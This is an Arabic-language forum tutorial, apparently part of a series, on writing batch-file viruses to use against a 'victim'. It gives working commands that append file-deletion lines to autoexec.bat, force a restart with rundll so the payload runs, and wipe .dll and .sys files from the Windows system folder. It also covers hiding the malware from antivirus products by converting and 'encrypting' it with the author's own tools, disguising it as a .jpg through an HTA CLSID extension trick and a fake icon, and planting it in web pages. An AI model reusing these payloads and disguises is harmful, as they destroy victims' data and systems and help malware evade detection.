ذكرنا انفاً
الان لدخول الدريف دى والغاء ملف اسمة اكس(تكست مثلاً) فى الدوس كنت باتكتب
c:/ press enter
فيتحول المحث الى
d:/
للاغاء هاتكتب
d:/Del x.txt press enter
اذن معنا الكود الدوسى وقد قمنا بالعملية على كام خطوة على خطوتين
اذن معنا الكود وعد الخطوات ومعنا الكود الاساسى للفيرس
نستنتج التالى
عدد سطر الكود لابد ان يكون
اثنين + واحد (اساسى) + اى عدد لو عاوز تكمل الفيرس لشىء تانى
فيكون
call attrib -h -r c:\autoexec.bat >nul
(اساسى)
echo d: >nul >>c:\autoexec.bat
(الدخول على الدريف دى)
echo Del x.txt >nul >>c:\autoexec.bat
(الغاء ملف امسة اكس تكست)
تذكر :::::
echo كود الدوس >nul >>c:\autoexec.bat
()()()()()()()()()()()()()()()()()()()
)( تدريــــــــــــــــــــــــــب
()()()()()()()()()()()()()()()()()()()
لو عاوز تلغى كل ملفات التكست فى الدريف دى يكون الكود
call attrib -h -r c:\autoexec.bat >nul
echo d: >nul >>c:\autoexec.bat
echo Del *.txt >nul >>c:\autoexec.bat
()()()()()()()()()()()()()()()()()()()
)( تدريــــــــــــــــــــــــــب
()()()()()()()()()()()()()()()()()()()
لو عاوز تلغى كل ملفات الزيب فى الدريف دى يكون الكود
call attrib -h -r c:\autoexec.bat >nul
echo d: >nul >>c:\autoexec.bat
echo Del *.zip >nul >>c:\autoexec.bat
ألان تصاب باحباط
بعد تصميم فيرس مثلاً لعمل الفورمات وكتبت الكود فى التكست
يمكنك الان حفظة بامتداد
*.bat
ولنفرض ان الضحية ضغط علية
لن يعمل
لن يعمل
(اسمعك تقول اللة يخرب بيتك يا سليمان بعد كل هذا وتقولى لن يعمل)
هاهاهاها
اخوىت الاعزاء صبراً
فلسوف يعمل لو قام الضحية بعمل ريستارت او طفىء الكمبيوتر ثم اعادة فتحة مجدداً
----------------
ماذا سوف يحدث
----------------
عندما ضغط على الفيرس انتقلت اوامر الدوس الى ملف الاوتواكسك
فلابد من اعادة التشغيل حتى يطلب الوندوز هذا الملف فيجدة وهو على الدوس فاينفذ الاور معتقداً انة يحمل اوامر البدء
-----------------------------------------------------------------
هل يمكن اضافة كود للفيرس بحيث يجعل الكمبيوتر يعمل ريستارت عند الضغط على الفيرس وبالتالى هايعمل
-------------------------------------------------------------------
بالطبع هناك
اضف هذا الكود
c:\windows\rundll.exe user.exe,exitwindowsexec
اذن صمم كود الفيرس
اضف فى السطر الاخير هذا الكود واحفظة الناتج على هيئة امتداد
*.bat
ألان عندما يضغط الضحية علية سوف يحدث وينتقل الاوامر الدوسية ومعها سطر الريستارت وهايحدث ريستارت ويتم تنفيظ الاوامر الدوسية فى سرعة كبير ة جدا اى اننا اجبرنا الضحية على عمل ريستارت لكى يشتغل الفيرس
--------------------------------------------
هل هناك اكواد اخرى مثل عمل اغلاق للوندوز
---------------------------------------------
c:\windows\rundll32.exe user.exe,exitwindows
هذا كود الغلاق
--------------------------------------------------------
الفورمات حرام يعم هل ممكن كود يقرب لعمل الغاء للوندوز
--------------------------------------------------------
@Echo off
c:
cd %WinDir%\System\
deltree /y *.dll
cd\
deltree /y *.sys
---------------
تحليلة
---------------
c: دخلنا على السى
cd %WinDir%\System\ دخلنا على ملف السيستم فى الوندوز
deltree /y *.dll الغاء كل ملفات الامتداد دى ال ال والتى يريدها الوندوز
cd\ خرجنا بعد تنفيذ العملية الاولى
deltree /y *.sys ر الغاء كل ملفات السيس فى مسا الوندوز
000000000000000000000000000000
الان معنا فكرة الفيرس وكيفية اجبار الضحية على عمل ريستارت او عمل اغلاق
ولكن لازل الفيرس مكشوف وامتدادة
*.bat
ماذا نحن فاعلون الان
لابد من تغير الامتداد اولاً
ثانياً تشفيرة
ثالثاً تغير امتداد او فكرة لكى يعمل عند الضحية بدون ما يحس سوء بالارسال عبر البريد (ليس على هيئة ملف مرفق بل اكواد مرفقة بتلغيمة)
اول دخولة على صفحة تم تلغيمها
اول تغير الامتداد بشكل تانى
الجزاء الثانى الفصل الثالث
نعود الى المشاكل
----------------
المشكلة الاولى
=========
عندى فيرس او انا صممتة من نوع البات كيف احصل على كود مثل التى سوف تستخدمها وكما تقول وتدعى اية الاحمق فى عمليتين
الاجابة
------
تحول البات الى ما نريد طبقاً للمسار التالى
*.bat------->*.exe-------->*.com-------->*.txt
ولكن للسهولة يمكنك استخدام برنامج
solisek
للتحويل من
*.bat-------->*.com
و من ثم حول الى تكست
وتحصل على الكود
شرح البرنامج
========
ضع ملف البات وليكن اسمة اكس مع البرنامج فى ملف واحد
ادخل على الدوس بنفس الطريقة السابقة
اكتب هذا الامر
solisek.com x.bat
اضغط انتر
اغلاق البرنامج والان تجد ان هناك ملف اسمة
x.com
قد تكون والباقى عليك لتحويلة الى تكست والحصول على الكود المشفر
-----------------------------------------------------
ما الهدف من تحويلة الى كود مشفر مكتوب وهل هناك طريقة اسهل من ذلك للتحويل
----------------------------------------------------
الهدف نذكرة فى اخر المقالة او نقولة فى المقالة القادمة ان لم يسعفنا الوقت
ملحوظة محبطة:
نظراً لفشلى فى الشرح
كنت قد قررنا تحويل الفيروسات الى اكواد مشفر بعد التخلص من امتدادها وتحويلها الى تكست ومن ثم نفك التشفير للحصول على الكود الحقيقى ثم التحويل الى
ASCII
والذى سوف نحتفظ بة ونصنع منة الكثير والكثير
لذلك
قمت ببرمجة برنامج بسيط وسهل جدا جدا بالفجوال بيسيك يقوم بعمل التحويلة بدلاً من البرامج التى قمت بشرحها والتى كتبتها بلغة
*.asm
الاسمبلى
الان شرح البرنامج
-----------------
وهو
SOLI-ASCII.exe
ما ان تفتح البرنامج
يظهر لك خانتين
الخانة الاولى تكتب بها مسار الفيرس باى امتداد
لخانة الاخرى تكتب بها مسار الناتج
مثال
------
انا عندى فيرس اسمة
x.com
اضعة على الدريف
d:/
افتح البرنامج
اكتب فى الخانة العليا
d:/x.com (مسارالفيرس)
اكتب فى الخانة السفلى
d:/virues.txt (مسار التكست الناتج)
الان اضغط على
Done
فتظر لك رسالة
Finished
الان اغلق البرنامج واذهب الى الدريف دى الموجود بة الفيرس
وابحث عن الملف الذى كتبة اسنة لكى يخرج وهو
virues.txt
افتحة فتجد الكود بعد تشفيرة وتحويلة الى
ASCII
التى نريدها
وبالتالى بهذا البرنامج ارحت رؤوساكم بملاين الكلمات والشروح والكثير والحمد اللة
الان اصبح لنا خلفية فى ايجاد كود الفيرس بشكل
ASCII
ماذا نحن فاعلون
لابد لنا من اصابة الهدف ولكن بعدة حيل
التشفير ايها المغفل اين هو
-------------------------
يا شباب الكثير يختلط علية الاحمر بين تشفير وضغط لذلك وعد منى فى احد المقالت ان اكتب عن التشفير ويا سيدى
افهم الفيروسات الاول وبعدين افهم التشفير وشفر الفيرس ثم حولة الى
ASCII
وبعدين طبق بة الحيل
اولاً
----
معنا فيرس تم تحويلة الى اكواد
ASCII
ماذا نفعل
0لابد ان تكون مختار من الاعلى
view
foldder options
view
وشايل العلمة من على
hide extenions
وذلك لكى يظهر الامتداد
1- الحيلة الاولى
----------------
الفكرة : نضع الكود فى تكست ونحول امتدادة الى بعد ما نغير بة ما يلازم
*.HTA
وليكن
x.hta
ثم نقوم بعملية اعادة الاسم الى
x.jpg
الان تغير امتدادة وبالتالى لم يكن فعال
اوكية عادى
نعمل اعادة تسمية اخرى الى
x.jpg.{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}
وهذا الـــ
{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}
يسمى بالـــ
CLASID
وهو الخاص لنوع
*.HTA
فتجد
الان الاسم تحول الى
x.jpg
فقط واختفى الكود المضافة وذلك لنة من نوع
invisible windows extentions
وتغيرت الايقونة
الان عند ملف اسمة
x.jpg
والامتداد هو
jpg
يمكنك تغير الايقونة
(مرفق ايقونة مع المرفقات)
باستخدام برنامج مثل الميكروايقون او هانك طريقة اخرى لا يسعنى الوقت لذكرها
بعد تغير الايقونة
اضغط على البرنامج
تجد ان انفتح ملف من نوع
*.hta
مشاكل
--------
بعد الاصابة ونحن نعلم ان نوع هذا الملف يحتاج الى عمل ريستارت لكى يعمل فماذا نفعل
ما هو التغير الذى يلازم تكوين هذا الملف
ما هى الحيل الاخرى
ماذا لو شك الضحية خصوصاً انة لم تظهر صورة لة
هل هناك حيل اخرى
(اكيد فالماذا اطلق على هذة حيلة اولى)
هل يمكنك شرح الطريقة بالتفصيل اكثر
(بالتاكيد لانى قلت هذة الفكرة اذن لابد من تفعيل هذة الفكرة)
هل يمكن ان تشرح فكرة الاسكرب
(اعتقج انها فكرة سخيفة ولكنى سوف اشرحها خصوصاً ان هناك احد الاعضاء مبرمج محترف كتب فى احد المنتديات الاجنبية التى يتسكع بها دائماً انة يستحل تغير ايقونة الاسكرب ولكنى سوف اغيرها )
كل هذا واكثر فى المقالة القادمة
واكرر اسفى ان كنت قصرت فى الشرح وقريباً ان شاء اللة مقالة مفصلة وكبيرة نوعاً ما
عد المقالات فى صناعة الفيورسات من نوع بات والدودة
اربعة او خمسة مقالات
بعد ان كتب لنا عمر ننتقل الى تعلم صناعة الفيروسات باستخدام الفجوال بيسيك وان كانت فكرتة سخيفة الى حداً ما
1- كيفية وضع كود فورمات او اى كود دوس فى صفحة انترنت (ندخل فى تفاصيلها اليوم)
2- كيفية الحصةل على كود اى افيرس وذلك بتحويل الامتدادات باستخدام برامجى ارفقتها مع المرفقات
exe ---> com ---> txt
bat ---> txt
3- شرحت برنامج من تصميم العبد للة والحمد اللة الواجد الماجد يقوم بتحويل اى فيرس ذو اى امتداد الى اكواد تضع فى تكتست من نوع
ASCII
4 - شرحت فكرة حيلة
CLASID
( نسترسل بها اليوم ان شاء اللة)
بسم اللة الرحمن الرحيم اولاً واخيراً
====================
نشرح التشفير + ادخل الفيرس البات الى صفحة انترنت + خدع الامتدادات
اولاً
===
التشفير
--------
قبل ما نبداء نسمى مع بعض كدة باسم الواجد الماجد موجد كل شىء ونقول يا هادى يارب
بما اننا نتكلم عن الفيروسات وليس التروجن او اى شىء اخر ان لابد ان اتحدث واصيبكم بالصداع عن تشفير الفيروسات واليوم نحن بصدد فيروسات البات اى الان معك الكود (شرحنا اما تصمم انت الكود او تحصل علية من فيرس كان عندك من قبل باستخدام براكجى للتحويل حتى تصل الى الامتداد التكست وتحصل على الكود)
اكرر الان اما ان تصمم الكود او تحصل علية
بعد الحصول علية
افتح برنامجى المرفق واسمة
soliboy.exe
فتظهر لك شاشة تجد بها عدة ازرار على اليمين وعلى اليسار ثلاث خانات كبيرة
تعمل كوبى للكود الفيرسى وتضع الكود فى الخانة الثانية (الخانة التى فى المنتصف)
الان اضغط على زر
understand
فتظر اشياء فى الخانة الاولى العليا (اتركها ولا يهمك)
الان اضغط على زر
Soli-bat
فيظهر كود بالاسفل فى الخانة السفلى وهو المراد
انسخة وضعة فى ملف تكست ثم احفظ الملف على امتداد
*.bat
----------------------------------------------------------------------
سؤال الى الاخ الاحمق سليمان هكذا يقول احدكم انت الان لم تحدد اى كود
-----------------------------------------------------------------------
اولاً
---
اذا كنت مصمم كود فيرس بات يمكنك تشفيرة باتباع الطريقة السابقة
ثانياً
-----
ان كنت حصل على كود الفيرس من احد الفيروسات التى كانت موجود من قبل على امتداد
*.exe
اذن حول الامتداد حسب ما ذكرتة فى المقالة الثالثة وكما يشير المخطط
exe--------->com-------->txt
bat------->txt
احصل على الكود ثم شفرة وضعة فى التكست واعد تسميتة الى امتداد
bat
=====================================
الان الفيرس تم تشفيرة ولا يكتشف من قبل مضادات الفيروسات
يمكنك الوقوف هنا وتكتفى بذلك
=====================================
-------------------------------------------------------------------
سؤال لماذا لا نستخدم مباشرة احد برامج التشفير والتى نسمع عنها :-
-------------------------------------------------------------------
شرح فكرة التشفير التى انخدع بها الكثير منهم محسوبكم
اولاً ايها السادة البرمج التى كثيراً ما نسمع عنها واقصد معظمها حتى لا يزعل احد تعتمد على ما يسمى
internal exe compressor
او الضغط الداخلى فمثلاً برامج لو احضرت سرفر وقمت بضغطة بالوين زيب وشغل النورنوت وجعلتة اوتو بروتكت بالتاكيد لان يراة الا لو قمت بعمل اسكان علية
هذا النوع يسمى
external copressor
اى الضغط الخارجى
ماذا لو فعلنا الضغط الداخلى مثل معظم البرامج تعمل ونقول عليها بتشفير
هنا لو كان النورتون اوتو بروتكت لان يلاحظة مثلة مثل الضغط الخارجى ولكن يفرق عنة لو انكن عملت لة اسكان ايضاً لن ينكشف
ماذا لو ضغط علية
@
هنا نورتون يكشفة بالرغم من انك قد عملت لة اسمان ولم يكشفة
لانك عندما تضغط علية يحدث
de-internal compressor
او بمعنى اخر عشان ما يتفزلك علينا واحد اجنبى يمكن قولها
internal de-compressor
ونتعنى عند الضغط يحدث فك الضغط الداخلى وهو طبيعى لكى يعمل السرفر وهنا لان نورتون اوتو بروتكت هايكشف اللعبة
اكرر انة هذا خطاء جسيم وقع معظمنا بة حتى انا فى البداية وقعت بة
ارسل السرفر وهوب اجدة لا يعمل (بالطبع لان الضحية كان مشغل نورتون وعامل اوتوبروتكت)
لذلك لجاء الناس السوبر الى تشفير الكود التى تم برمجتة البرنامج بة
وعشان كدة تجد ان هناك برامج اختراق لا تحتاج الى تشفير انما تحتاج الى ضغط فقط وايضاً تجد سرفرات قتل مضادات الفيروسات لا تحتاج الى تشفير وذلك لان المصممة قد شفرة كودى يطلق عليها بالانجليزى
internal codic Encrypt
لذلك فكر محسوبكم العبد الفقير ان يبرمج برنامج بسيط وسهل لتشفير الفيروسات من نوع البات او التى تم تحويلها الى البات (ذكرنا التحويل فى المقالة الثانية ابوس يدك راجعها وحاول ان تفهم من مغفل مثلى لان شرحها قمة نعم قمة فى الردائة والسوء)
وهذا البرنامج شرحتة فى الاعلى
(بالنسبة لتشفير الباتش ان شاء اللة اضع برنامج من تصميم العبد الفقير وكويس الى حداً ما ويكون واحد يعنى اهوة شىء عربى اصيل ولكن واللة الى ماخرة انى ما بحب اكتب فى كذا موضوع واحنا النهاردة فى الفيروسات وكمان ما عملت لة كمبيل يعنى حولتة الى ملف تنفيذى ان شاء ان كتب لنا عمر يكون قريبا قريبا جدا)
ثالثاً
-----
فى كلتا الحالتين تحول الى بات
حولة باستخدام برنامجى الذى ارفقتة فى المقالة السابقة
SOLI-ASCII.exe
الى اكواد
احتفظ بها والان ننتقل الى الجزاء التانى اى اننا
صممنا الكود او حصلنا علية + تم تشفير الكود وتحويلة الى بات + تم تحويلة الى اكواد من نواع اية اس سى اى اى
الجزاء الثانى وهو ادخال هذا الفيرس على صفحة انترنت
------------------------------------------------------
الكود الان بين يدنا مشفر ومتحول الى ارقام وكلام فارغ لوضعة بصفحة انترنت